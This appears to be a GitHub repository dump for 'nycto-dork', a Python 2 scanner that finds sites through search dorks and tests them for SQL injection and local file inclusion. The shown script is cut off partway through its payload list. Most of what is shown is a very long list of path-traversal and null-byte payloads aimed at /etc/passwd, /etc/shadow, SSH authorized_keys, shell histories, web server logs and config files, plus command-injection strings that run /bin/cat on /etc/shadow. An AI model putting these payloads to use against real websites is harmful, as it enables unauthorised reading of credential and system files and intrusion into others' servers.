├── LICENSE ├── README.md ├── _config.yml └── nyctodork.py /LICENSE: -------------------------------------------------------------------------------- 1 | +MIT License 2 | + 3 | +Copyright (c) 2017 Argoles nycto-hackerone 4 | + 5 | +Permission is hereby granted, free of charge, to any person obtaining a copy 6 | +of this software and associated documentation files (the "Software"), to deal 7 | +in the Software without restriction, including without limitation the rights 8 | +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | +copies of the Software, and to permit persons to whom the Software is 10 | +furnished to do so, subject to the following conditions: 11 | + 12 | +The above copyright notice and this permission notice shall be included in all 13 | +copies or substantial portions of the Software. 14 | + 15 | +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | +SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # nycto-dork 2 | Dork scanner with SQL injection (SQLi) and local file inclusion (LFI) testing. 3 | 4 | Go to the saved file and make it executable: 5 | 6 | cd "wherever you saved the file" 7 | 8 | Run the script with ./nyctodork.py 9 | 10 | ![screenshot from 2017-11-25 19-17-49](https://user-images.githubusercontent.com/31374857/33233916-db61f88a-d215-11e7-817c-9aeef6c7d5ad.png) 11 | ![screenshot from 2017-11-25 19-18-32](https://user-images.githubusercontent.com/31374857/33233917-db963924-d215-11e7-9052-b66d958eddb1.png) 12 | ![screenshot from 2017-11-25 19-19-38](https://user-images.githubusercontent.com/31374857/33233918-dca2c36e-d215-11e7-9a7b-4697295953e7.png) 13 | 14 | The script still crashes sometimes; I hope to get that fixed soon. 15 | 16 | 17 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-hacker -------------------------------------------------------------------------------- /nyctodork.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # This was written for educational purposes and pentesting only. Use it at your own risk. 3 | # The author will not be responsible for any damage! 
4 | # 5 | # Toolname : nycto.py 6 | # Coder : NYCTO 7 | # Re-written by : ^^^^^^^^ 8 | # Version : 0.5 9 | # 10 | 11 | import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess 12 | from random import choice 13 | 14 | # Colours 15 | W = "\033[0m"; 16 | R = "\033[31m"; 17 | G = "\033[32m"; 18 | O = "\033[33m"; 19 | B = "\033[34m"; 20 | 21 | 22 | # Banner 23 | def logo(): 24 | print G+"\n " 25 | 26 | print "███╗ ██╗██╗ ██╗ ██████╗████████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ " 27 | print "████╗ ██║╚██╗ ██╔╝██╔════╝╚══██╔══╝██╔═══██╗ ██╔══██╗██╔═══██╗██╔══██╗██║ ██╔╝ " 28 | print "██╔██╗ ██║ ╚████╔╝ ██║ ██║ ██║ ██║█████╗██║ ██║██║ ██║██████╔╝█████╔╝ " 29 | print "██║╚██╗██║ ╚██╔╝ ██║ ██║ ██║ ██║╚════╝██║ ██║██║ ██║██╔══██╗██╔═██╗ " 30 | print "██║ ╚████║ ██║ ╚██████╗ ██║ ╚██████╔╝ ██████╔╝╚██████╔╝██║ ██║██║ ██╗ " 31 | print "╚═╝ ╚═══╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ " 32 | print " A World Designed By Technology Is A World Designed To Be Broken..! 
" 33 | print " Written By Nycto " 34 | print " Nycto - Dork - Scanner " 35 | print "====================================================================================\n" 36 | print G 37 | 38 | if sys.platform == 'linux' or sys.platform == 'linux2': 39 | subprocess.call("clear", shell=True) 40 | logo() 41 | 42 | else: 43 | subprocess.call("cls", shell=True) 44 | logo() 45 | 46 | log = "Nycto-check.txt" 47 | logfile = open(log, "a") 48 | lfi_log = "Nycto-dOrk-lfi.txt" 49 | lfi_log_file = open(lfi_log, "a") 50 | threads = [] 51 | finallist = [] 52 | vuln = [] 53 | timeout = 350 54 | socket.setdefaulttimeout(timeout) 55 | 56 | 57 | 58 | 59 | lfis = ["/etc/passwd%00", 60 | "../etc/passwd%00", 61 | "../../etc/passwd%00", 62 | "../../../etc/passwd%00", 63 | "../../../../etc/passwd%00", 64 | "../../../../../etc/passwd%00", 65 | "../../../../../../etc/passwd%00", 66 | "../../../../../../../etc/passwd%00", 67 | "../../../../../../../../etc/passwd%00", 68 | "../../../../../../../../../etc/passwd%00", 69 | "../../../../../../../../../../etc/passwd%00", 70 | "../../../../../../../../../../../etc/passwd%00", 71 | "../../../../../../../../../../../../etc/passwd%00", 72 | "../../../../../../../../../../../../../etc/passwd%00", 73 | "/etc/passwd", 74 | "../etc/passwd", 75 | "../../etc/passwd", 76 | "../../../etc/passwd", 77 | "../../../../etc/passwd", 78 | "../../../../../etc/passwd", 79 | "../../../../../../etc/passwd", 80 | "../../../../../../../etc/passwd", 81 | "../../../../../../../../etc/passwd", 82 | "../../../../../../../../../etc/passwd", 83 | "../../../../../../../../../../etc/passwd", 84 | "../../../../../../../../../../../etc/passwd", 85 | "../../../../../../../../../../../../etc/passwd", 86 | "../../../../../../../../../../../../../etc/passwd""%00../../../../../../etc/passwd", 87 | "%00../../../../../../etc/shadow", 88 | "%00/etc/passwd%00", 89 | "%00/etc/shadow%00", 90 | "%0a/bin/cat%20/etc/passwd", 91 | "%0a/bin/cat%20/etc/shadow", 92 | 
"%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini", 93 | "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00", 94 | "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00", 95 | "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini", 96 | "../../../../../../../../../../../../boot.ini", 97 | "../../../../../../../../../../../../boot.ini%00", 98 | "../../../../../../../../../../../../etc/hosts", 99 | "../../../../../../../../../../../../etc/hosts%00", 100 | "../../../../../../../../../../../../etc/passwd", 101 | "../../../../../../../../../../../../etc/passwd%00", 102 | "../../../../../../../../../../../../etc/shadow", 103 | "../../../../../../../../../../../../etc/shadow%00", 104 | "../../../../../../../../../../../../localstart.asp", 105 | "../../../../../../../../../../../../localstart.asp%00", 106 | "../../../../../../../../conf/server.xml", 107 | "../../../../../apache/logs/access.log", 108 | "../../../../../apache/logs/error.log", 109 | "../../../../../etc/httpd/logs/access.log", 110 | "../../../../../etc/httpd/logs/access_log", 111 | "../../../../../etc/httpd/logs/error.log", 112 | "../../../../../etc/httpd/logs/error_log", 113 | "../../../../../logs/access.log", 114 | "../../../../../logs/error.log", 115 | "../../../../../usr/local/apache/logs/access.log", 116 | "../../../../../usr/local/apache/logs/access_log", 117 | "../../../../../usr/local/apache/logs/error.log", 118 | "../../../../../usr/local/apache/logs/error_log", 119 | "../../../../../var/log/access_log", 120 | "../../../../../var/log/apache/access.log", 121 | "../../../../../var/log/apache/access_log", 122 | "../../../../../var/log/apache/error.log", 123 | "../../../../../var/log/apache/error_log", 124 | "../../../../../var/log/error_log", 125 | 
"../../../../../var/log/httpd/access_log", 126 | "../../../../../var/log/httpd/error_log", 127 | "../../../../../var/www/logs/access.log", 128 | "../../../../../var/www/logs/error.log", 129 | "../../../../../var/www/logs/error_log", 130 | "../../../../apache/logs/access.log", 131 | "../../../../apache/logs/error.log", 132 | "../../../../logs/access.log", 133 | "../../../../logs/error.log", 134 | "../../../apache/logs/access.log", 135 | "../../../apache/logs/error.log", 136 | "../../../logs/access.log", 137 | "../../../logs/error.log", 138 | "../../apache/logs/access.log", 139 | "../../apache/logs/error.log", 140 | "../../boot.ini", 141 | "../../logs/access.log", 142 | "../../logs/error.log", 143 | "../apache/logs/access.log", 144 | "../apache/logs/error.log", 145 | "../logs/access.log", 146 | "../logs/error.log", 147 | "..\..\..\..\..\..\..\..\..\..boot.ini", 148 | "..\..\..\..\..\..\..\..\..\..boot.ini%00", 149 | "..\..\..\..\..\..\..\..\..\..\etc\passwd", 150 | "..\..\..\..\..\..\..\..\..\..\etc\passwd%00", 151 | "..\..\..\..\..\..\..\..\..\..\etc\shadow", 152 | "..\..\..\..\..\..\..\..\..\..\etc\shadow%00", 153 | ".\./.\./../.\./../.\./etc/passwd", 154 | ".\./.\/.\./.\./../../etc/shadow", 155 | "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00", 156 | "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini", 157 | "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini", 158 | "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", 159 | "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow", 160 | "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd", 161 | "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow", 162 | "/.../.../.../.../.../", 163 | "/../../../../../../../../%2A", 164 | 
"/../../../../../../../../../../../boot.ini", 165 | "/../../../../../../../../../../../boot.ini%00", 166 | "/../../../../../../../../../../../boot.ini%00.html", 167 | "/../../../../../../../../../../../boot.ini%00.jpg", 168 | "/../../../../../../../../../../../etc/passwd%00.html", 169 | "/../../../../../../../../../../../etc/passwd%00.jpg", 170 | "/../../../../../../../../../../etc/passwd", 171 | "/../../../../../../../../../../etc/passwd^^", 172 | "/../../../../../../../../../../etc/shadow", 173 | "/../../../../../../../../../../etc/shadow^^", 174 | "/../../../../../../../../bin/id|", 175 | "/../../var/www/logs/access_log", 176 | "/..\../..\../..\../..\../..\../..\../boot.ini", 177 | "/..\../..\../..\../..\../..\../..\../etc/passwd", 178 | "/..\../..\../..\../..\../..\../..\../etc/shadow", 179 | "/./././././././././././boot.ini", 180 | "/./././././././././././etc/passwd", 181 | "/./././././././././././etc/shadow", 182 | "/.\./../.\./.\./.\./.\./boot.ini", 183 | "/NetServer/bin\stable/apache\php.ini", 184 | "/PHP\php.ini", 185 | "/Program Files\Apache Group\Apache2\conf\httpd.conf", 186 | "/Program Files\Apache Group\Apache\conf\httpd.conf", 187 | "/Program Files\Apache Group\Apache\logs/access.log", 188 | "/Program Files\Apache Group\Apache\logs\error.log", 189 | "/Program Files/xampp/apache\conf\httpd.conf", 190 | "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", 191 | "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", 192 | "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", 193 | "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", 194 | "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", 195 | "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", 196 | "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", 197 | "/Volumes/webBackup/opt/apache2/conf/httpd.conf", 198 | "/Volumes/webBackup/private/etc/httpd/httpd.conf", 199 | "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", 200 | "/WINDOWS\php.ini", 201 | "/WINNT\php.ini", 202 | 
"/apache/logs/access.log", 203 | "/apache/logs/error.log", 204 | "/apache2/logs/access.log", 205 | "/apache2/logs/error.log", 206 | "/apache\php\php.ini", 207 | "/bin/php.ini", 208 | "/etc/apache/apache.conf", 209 | "/etc/apache/conf/httpd.conf", 210 | "/etc/apache/httpd.conf", 211 | "/etc/apache2/apache2.conf", 212 | "/etc/apache2/conf/httpd.conf", 213 | "/etc/apache2/httpd.conf", 214 | "/etc/apache2/sites-available/default", 215 | "/etc/apache2/vhosts.d/default_vhost.include", 216 | "/etc/chrootUsers", 217 | "/etc/ftpchroot", 218 | "/etc/ftphosts", 219 | "/etc/group", 220 | "/etc/http/conf/httpd.conf", 221 | "/etc/http/httpd.conf", 222 | "/etc/httpd.conf", 223 | "/etc/httpd/conf/httpd.conf", 224 | "/etc/httpd/httpd.conf", 225 | "/etc/httpd/logs/acces.log", 226 | "/etc/httpd/logs/acces_log", 227 | "/etc/httpd/logs/access.log", 228 | "/etc/httpd/logs/access_log", 229 | "/etc/httpd/logs/error.log", 230 | "/etc/httpd/logs/error_log", 231 | "/etc/httpd/php.ini", 232 | "/etc/init.d/apache", 233 | "/etc/init.d/apache2", 234 | "/etc/logrotate.d/ftp", 235 | "/etc/logrotate.d/proftpd", 236 | "/etc/logrotate.d/vsftpd.log", 237 | "/etc/mail/access", 238 | "/etc/my.cnf", 239 | "/etc/mysql/my.cnf", 240 | "/etc/php.ini", 241 | "/etc/php/apache/php.ini", 242 | "/etc/php/apache2/php.ini", 243 | "/etc/php/cgi/php.ini", 244 | "/etc/php/php.ini", 245 | "/etc/php/php4/php.ini", 246 | "/etc/php4.4/fcgi/php.ini", 247 | "/etc/php4/apache/php.ini", 248 | "/etc/php4/apache2/php.ini", 249 | "/etc/php4/cgi/php.ini", 250 | "/etc/php5/apache/php.ini", 251 | "/etc/php5/apache2/php.ini", 252 | "/etc/php5/cgi/php.ini", 253 | "/etc/proftp.conf", 254 | "/etc/proftpd/modules.conf", 255 | "/etc/protpd/proftpd.conf", 256 | "/etc/pure-ftpd.conf", 257 | "/etc/pure-ftpd/pure-ftpd.conf", 258 | "/etc/pure-ftpd/pure-ftpd.pdb", 259 | "/etc/pure-ftpd/pureftpd.pdb", 260 | "/etc/pureftpd.passwd", 261 | "/etc/pureftpd.pdb", 262 | "/etc/security/environ", 263 | "/etc/security/failedlogin", 264 | 
"/etc/security/group", 265 | "/etc/security/lastlog", 266 | "/etc/security/limits", 267 | "/etc/security/passwd", 268 | "/etc/security/user", 269 | "/etc/shadow", 270 | "/etc/utmp", 271 | "/etc/vhcs2/proftpd/proftpd.conf", 272 | "/etc/vsftpd.chroot_list", 273 | "/etc/vsftpd.conf", 274 | "/etc/vsftpd/vsftpd.conf", 275 | "/etc/wtmp", 276 | "/etc/wu-ftpd/ftpaccess", 277 | "/etc/wu-ftpd/ftphosts", 278 | "/etc/wu-ftpd/ftpusers", 279 | "/home/apache/conf/httpd.conf", 280 | "/home/apache/httpd.conf", 281 | "/home2/bin\stable/apache\php.ini", 282 | "/home/bin\stable/apache\php.ini", 283 | "/logs/access.log", 284 | "/logs/error.log", 285 | "/logs/pure-ftpd.log", 286 | "/opt/apache/conf/httpd.conf", 287 | "/opt/apache2/conf/httpd.conf", 288 | "/opt/lampp/logs/access.log", 289 | "/opt/lampp/logs/access_log", 290 | "/opt/lampp/logs/error.log", 291 | "/opt/lampp/logs/error_log", 292 | "/opt/xampp/etc/php.ini", 293 | "/opt/xampp/logs/access.log", 294 | "/opt/xampp/logs/access_log", 295 | "/opt/xampp/logs/error.log", 296 | "/opt/xampp/logs/error_log", 297 | "/php4\php.ini", 298 | "/php5\php.ini", 299 | "/php\php.ini", 300 | "/private/etc/httpd/httpd.conf", 301 | "/private/etc/httpd/httpd.conf.default", 302 | "/proc/self/cmdline", 303 | "/proc/self/envron", 304 | "/root/.Xauthority", 305 | "/root/.bash_history", 306 | "/root/.bash_logut", 307 | "/root/.ksh_history", 308 | "/usr/apache/conf/httpd.conf", 309 | "/usr/apache2/conf/httpd.conf", 310 | "/usr/etc/pure-ftpd.conf", 311 | "/usr/lib/cron/log", 312 | "/usr/lib/php.ini", 313 | "/usr/lib/php/php.ini", 314 | "/usr/lib/security/mkuser.default", 315 | "/usr/local/Zend/etc/php.ini", 316 | "/usr/local/apache/conf/httpd.conf", 317 | "/usr/local/apache/conf/php.ini", 318 | "/usr/local/apache/httpd.conf", 319 | "/usr/local/apache/log", 320 | "/usr/local/apache/logs", 321 | "/usr/local/apache/logs/access. 
log", 322 | "/usr/local/apache/logs/access.log", 323 | "/usr/local/apache/logs/access_ log", 324 | "/usr/local/apache/logs/access_log", 325 | "/usr/local/apache/logs/error.log", 326 | "/usr/local/apache/logs/error_log", 327 | "/usr/local/apache2/conf/httpd.conf", 328 | "/usr/local/apache2/httpd.conf", 329 | "/usr/local/apache2/logs/access.log", 330 | "/usr/local/apache2/logs/access_log", 331 | "/usr/local/apache2/logs/error.log", 332 | "/usr/local/apache2/logs/error_log", 333 | "/usr/local/apps/apache/conf/httpd.conf", 334 | "/usr/local/apps/apache2/conf/httpd.conf", 335 | "/usr/local/cpanel/logs", 336 | "/usr/local/cpanel/logs/access_log", 337 | "/usr/local/cpanel/logs/error_log", 338 | "/usr/local/cpanel/logs/license_log", 339 | "/usr/local/cpanel/logs/login_log", 340 | "/usr/local/cpanel/logs/stats_log" 341 | "/usr/local/etc/apache/conf/httpd.conf", 342 | "/usr/local/etc/apache/vhosts.conf", 343 | "/usr/local/etc/apache2/conf/httpd.conf", 344 | "/usr/local/etc/httpd/conf/httpd.conf", 345 | "/usr/local/etc/httpd/logs/access_log", 346 | "/usr/local/etc/httpd/logs/error_log", 347 | "/usr/local/etc/php.ini", 348 | "/usr/local/etc/pure-ftpd.conf", 349 | "/usr/local/etc/pureftpd.pdb", 350 | "/usr/local/httpd/conf/httpd.conf", 351 | "/usr/local/lib/php.ini", 352 | "/usr/local/php/httpd.conf", 353 | "/usr/local/php/httpd.conf.php", 354 | "/usr/local/php/lib/php.ini", 355 | "/usr/local/php4/httpd.conf", 356 | "/usr/local/php4/httpd.conf.php", 357 | "/usr/local/php4/lib/php.ini", 358 | "/usr/local/php5/httpd.conf", 359 | "/usr/local/php5/httpd.conf.php", 360 | "/usr/local/php5/lib/php.ini", 361 | "/usr/local/pureftpd/etc/pure-ftpd.conf", 362 | "/usr/local/pureftpd/etc/pureftpd.pdb", 363 | "/usr/local/pureftpd/sbin/pure-config.pl", 364 | "/usr/local/www/logs/thttpd_log", 365 | "/usr/pkgsrc/net/pureftpd/", 366 | "/usr/ports/contrib/pure-ftpd/", 367 | "/usr/ports/ftp/pure-ftpd/", 368 | "/usr/ports/net/pure-ftpd/", 369 | "/usr/sbin/pure-config.pl", 370 | "/usr/spool/lp/log", 
371 | "/usr/spool/mqueue/syslog", 372 | "/var/adm", 373 | "/var/adm/SYSLOG", 374 | "/var/adm/X0msgs", 375 | "/var/adm/acct/sum/loginlog", 376 | "/var/adm/aculog", 377 | "/var/adm/aculogs", 378 | "/var/adm/crash/unix", 379 | "/var/adm/crash/vmcore", 380 | "/var/adm/cron/log", 381 | "/var/adm/dtmp", 382 | "/var/adm/lastlog/username", 383 | "/var/adm/log/asppp.log", 384 | "/var/adm/log/xferlog", 385 | "/var/adm/loginlog", 386 | "/var/adm/lp/lpd-errs", 387 | "/var/adm/messages", 388 | "/var/adm/pacct", 389 | "/var/adm/qacct", 390 | "/var/adm/ras/bootlog", 391 | "/var/adm/ras/errlog", 392 | "/var/adm/sulog", 393 | "/var/adm/utmp", 394 | "/var/adm/utmpx", 395 | "/var/adm/vold.log", 396 | "/var/adm/wtmp", 397 | "/var/adm/wtmpx", 398 | "/var/apache/log", 399 | "/var/apache/logs", 400 | "/var/apache/logs/access_log", 401 | "/var/apache/logs/error_log", 402 | "/var/cpanel/cpanel.config", 403 | "/var/cron/log", 404 | "/var/lib/mysql/my.cnf", 405 | "/var/local/www/conf/php.ini", 406 | "/var/lock/samba", 407 | "/var/log", 408 | "/var/log/POPlog", 409 | "/var/log/access.log", 410 | "/var/log/access_log", 411 | "/var/log/acct", 412 | "/var/log/apache-ssl/access.log", 413 | "/var/log/apache-ssl/error.log", 414 | "/var/log/apache/access.log", 415 | "/var/log/apache/access_log", 416 | "/var/log/apache/error.log", 417 | "/var/log/apache/error_log", 418 | "/var/log/apache2/access.log", 419 | "/var/log/apache2/access_log", 420 | "/var/log/apache2/error.log", 421 | "/var/log/apache2/error_log", 422 | "/var/log/auth", 423 | "/var/log/auth.log", 424 | "/var/log/authlog", 425 | "/var/log/boot.log", 426 | "/var/log/cron.log", 427 | "/var/log/error.log", 428 | "/var/log/error_log", 429 | "/var/log/exim/mainlog", 430 | "/var/log/exim/paniclog", 431 | "/var/log/exim/rejectlog", 432 | "/var/log/exim_mainlog", 433 | "/var/log/exim_paniclog", 434 | "/var/log/exim_rejectlog", 435 | "/var/log/ftp-proxy", 436 | "/var/log/ftp-proxy/ftp-proxy.log", 437 | "/var/log/ftplog", 438 | "/var/log/httpd/", 439 
| "/var/log/httpd/access.log", 440 | "/var/log/httpd/access_log", 441 | "/var/log/httpd/error.log", 442 | "/var/log/httpd/error_log", 443 | "/var/log/httpsd/ssl.access_log", 444 | "/var/log/httpsd/ssl_log", 445 | "/var/log/kern.log", 446 | "/var/log/lastlog", 447 | "/var/log/lighttpd", 448 | "/var/log/maillog", 449 | "/var/log/message", 450 | "/var/log/messages", 451 | "/var/log/mysql.log", 452 | "/var/log/mysql/mysql-bin.log", 453 | "/var/log/mysql/mysql-slow.log", 454 | "/var/log/mysql/mysql.log", 455 | "/var/log/mysqld.log", 456 | "/var/log/mysqlderror.log", 457 | "/var/log/ncftpd.errs", 458 | "/var/log/ncftpd/misclog.txt", 459 | "/var/log/news", 460 | "/var/log/news.all", 461 | "/var/log/news/news", 462 | "/var/log/news/news.all", 463 | "/var/log/news/news.crit", 464 | "/var/log/news/news.err", 465 | "/var/log/news/news.notice", 466 | "/var/log/news/suck.err", 467 | "/var/log/news/suck.notice", 468 | "/var/log/poplog", 469 | "/var/log/proftpd", 470 | "/var/log/proftpd.access_log", 471 | "/var/log/proftpd.xferlog", 472 | "/var/log/proftpd/xferlog.legacy", 473 | "/var/log/pure-ftpd/pure-ftpd.log", 474 | "/var/log/pureftpd.log", 475 | "/var/log/qmail", 476 | "/var/log/qmail/", 477 | "/var/log/samba", 478 | "/var/log/samba-log.%m", 479 | "/var/log/secure", 480 | "/var/log/smtpd", 481 | "/var/log/spooler", 482 | "/var/log/syslog", 483 | "/var/log/telnetd", 484 | "/var/log/thttpd_log", 485 | "/var/log/utmp", 486 | "/var/log/vsftpd.log", 487 | "/var/log/wtmp", 488 | "/var/log/xferlog", 489 | "/var/log/yum.log", 490 | "/var/lp/logs/lpNet", 491 | "/var/lp/logs/lpsched", 492 | "/var/lp/logs/requests", 493 | "/var/mysql.log", 494 | "/var/run/utmp", 495 | "/var/saf/_log", 496 | "/var/saf/port/log", 497 | "/var/spool/errors", 498 | "/var/spool/locks", 499 | "/var/spool/logs", 500 | "/var/spool/tmp", 501 | "/var/www/conf/httpd.conf", 502 | "/var/www/html/.htaccess", 503 | "/var/www/localhost/htdocs/.htaccess", 504 | "/var/www/log/access_log", 505 | "/var/www/log/error_log", 
506 | "/var/www/logs/access.log", 507 | "/var/www/logs/access_log", 508 | "/var/www/logs/error.log", 509 | "/var/www/logs/error_log", 510 | "/var/www/sitename/htdocs/", 511 | "/var/www/vhosts/sitename/httpdocs/.htaccess", 512 | "/var/www/web1/html/.htaccess", 513 | "/web/conf/php.ini", 514 | "/www/logs/proftpd.system.log", 515 | "/xampp\apache\bin\php.ini", 516 | "C:/boot.ini", 517 | "C:/inetpub/wwwroot/global.asa", 518 | "C:\boot.ini", 519 | "C:\inetpub\wwwroot\global.asa", 520 | "\..\..\..\..\..\..\..\..\..\..\boot.ini", 521 | "\..\..\..\..\..\..\..\..\..\..\etc\passwd", 522 | "\..\..\..\..\..\..\..\..\..\..\etc\passwd%00", 523 | "\..\..\..\..\..\..\..\..\..\..\etc\shadow", 524 | "\..\..\..\..\..\..\..\..\..\..\etc\shadow%00", 525 | "\\'/bin/cat%20/etc/passwd\\'", 526 | "\\'/bin/cat%20/etc/shadow\\'", 527 | "c:\Program Files\Apache Group\Apache\logs\access.log", 528 | "c:\Program Files\Apache Group\Apache\logs\error.log", 529 | "c:\System32\Inetsrv\metabase.xml", 530 | "c:\apache\logs\access.log", 531 | "c:\apache\logs\error.log", 532 | "c:\inetpub\wwwroot\index.asp", 533 | "d:\System32\Inetsrv\metabase.xml", 534 | "/var/log/mysqld.log", 535 | "/etc/passwd", 536 | "/etc/shadow", 537 | "/etc/hosts", 538 | "/etc/hosts.allow", 539 | "/etc/hosts.equiv", 540 | "/etc/hosts.deny", 541 | "/etc/ssh/sshd_config", 542 | "/etc/apache/httpd.conf", 543 | "/etc/resolv.conf", 544 | "/var/log/message", 545 | "/etc/inetd.conf", 546 | "/etc/crontab", 547 | "/etc/defaultdomain", 548 | "/etc/rpc", 549 | "/.rhosts", 550 | "/.shosts", 551 | "/.ssh/authorized_keys", 552 | "/.bash_history", 553 | "/.bash_profile", 554 | "/.sh_history", 555 | "/.profile", 556 | "/.bashrc", 557 | "/.logout", 558 | "/.Xauthority", 559 | "/.netrc", 560 | "/.cshrc", 561 | "/etc/hostname.hme0", 562 | "/etc/hostname.pcn0", 563 | "/etc/hostname.iprb0", 564 | "/etc/hostname.qfe0", 565 | "/etc/hostname.eri0", 566 | "/etc/hostname.bge", 567 | "/etc/hostname.ce0", 568 | "/etc/hostname.dmfe0", 569 | 
"/etc/hostname.dnet0", 570 | "/etc/hostname.elx0", 571 | "/etc/hostname.elxl0", 572 | "/etc/hostname.spwr0", 573 | "/etc/hostname.eri0", 574 | "/etc/hostname.ge0", 575 | "/etc/hostname.ieef0", 576 | "/etc/hostname.le0", 577 | "/etc/hostname.dcelx0", 578 | "/etc/hostname.ecn0", 579 | "/etc/hostname.lo", 580 | "/etc/hostname.hme1", 581 | "/etc/hostname.pcn1", 582 | "/etc/hostname.iprb1", 583 | "/etc/hostname.qfe1", 584 | "/etc/hostname.eri1", 585 | "/etc/hostname.bge", 586 | "/etc/hostname.ce1", 587 | "/etc/hostname.dmfe1", 588 | "/etc/hostname.dnet1", 589 | "/etc/hostname.elx1", 590 | "/etc/hostname.elxl1", 591 | "/etc/hostname.spwr1", 592 | "/etc/hostname.eri1", 593 | "/etc/hostname.ge1", 594 | "/etc/hostname.ieef1", 595 | "/etc/hostname.le1", 596 | "/etc/hostname.dcelx1", 597 | "/etc/hostname.ecn1", 598 | "/etc/hostname.lo", 599 | "/etc/hostname.hme2", 600 | "/etc/hostname.pcn2", 601 | "/etc/hostname.iprb2", 602 | "/etc/hostname.qfe2", 603 | "/etc/hostname.eri2", 604 | "/etc/hostname.bge", 605 | "/etc/hostname.ce2", 606 | "/etc/hostname.dmfe2", 607 | "/etc/hostname.dnet2", 608 | "/etc/hostname.elx2", 609 | "/etc/hostname.elxl2", 610 | "/etc/hostname.spwr2", 611 | "/etc/hostname.eri2", 612 | "/etc/hostname.ge2", 613 | "/etc/hostname.ieef2", 614 | "/etc/hostname.le2", 615 | "/etc/hostname.dcelx2", 616 | "/etc/hostname.ecn2", 617 | "/etc/hostname.lo", 618 | "/etc/hostname.hme3", 619 | "/etc/hostname.pcn3", 620 | "/etc/hostname.iprb3", 621 | "/etc/hostname.qfe3", 622 | "/etc/hostname.eri3", 623 | "/etc/hostname.bge", 624 | "/etc/hostname.ce3", 625 | "/etc/hostname.dmfe3", 626 | "/etc/hostname.dnet3", 627 | "/etc/hostname.elx3", 628 | "/etc/hostname.elxl3", 629 | "/etc/hostname.spwr3", 630 | "/etc/hostname.eri3", 631 | "/etc/hostname.ge3", 632 | "/etc/hostname.ieef3", 633 | "/etc/hostname.le3", 634 | "/etc/hostname.dcelx3", 635 | "/etc/hostname.ecn3", 636 | "/etc/hostname.lo", 637 | "/etc/default/passwd", 638 | "/etc/syslog.conf", 639 | "/etc/syslogd.conf", 640 | 
"/etc/release", 641 | "/etc/motd", 642 | "/etc/issue", 643 | "/etc/group", 644 | "/etc/nsswitch.conf", 645 | "/etc/opt/ipf/ipf.conf", 646 | "/etc/opt/ipf/ipnat.conf", 647 | "/etc/vfstab", 648 | "/etc/system", 649 | "/etc/defaultrouter", 650 | "/var/adm/messages", 651 | "/var/log/syslog", 652 | "/var/adm/utmpx", 653 | "/var/adm/loginlog", 654 | "/var/adm/lastlog", 655 | "/etc/netconfig", 656 | "/var/log/authlog", 657 | "/log/miscDir/accesslog", 658 | "/etc/sudoers", 659 | "/etc/httpd/conf/httpd.conf", 660 | "/etc/make.conf", 661 | "/etc/apt/sources.list", 662 | "/etc/passwd", 663 | "/etc/shadow", 664 | "/etc/hosts", 665 | "/etc/hosts.allow", 666 | "/etc/hosts.equiv", 667 | "/etc/hosts.deny", 668 | "/etc/ssh/sshd_config", 669 | "/etc/apache/httpd.conf", 670 | "/etc/resolv.conf", 671 | "/var/log/messages", 672 | "/var/log/dmesg", 673 | "/etc/inetd.conf", 674 | "/etc/crontab", 675 | "/etc/defaultdomain", 676 | "/etc/rpc", 677 | "/.rhosts", 678 | "/.shosts", 679 | "/.ssh/authorized_keys", 680 | "/.bash_history", 681 | "/.bash_profile", 682 | "/.sh_history", 683 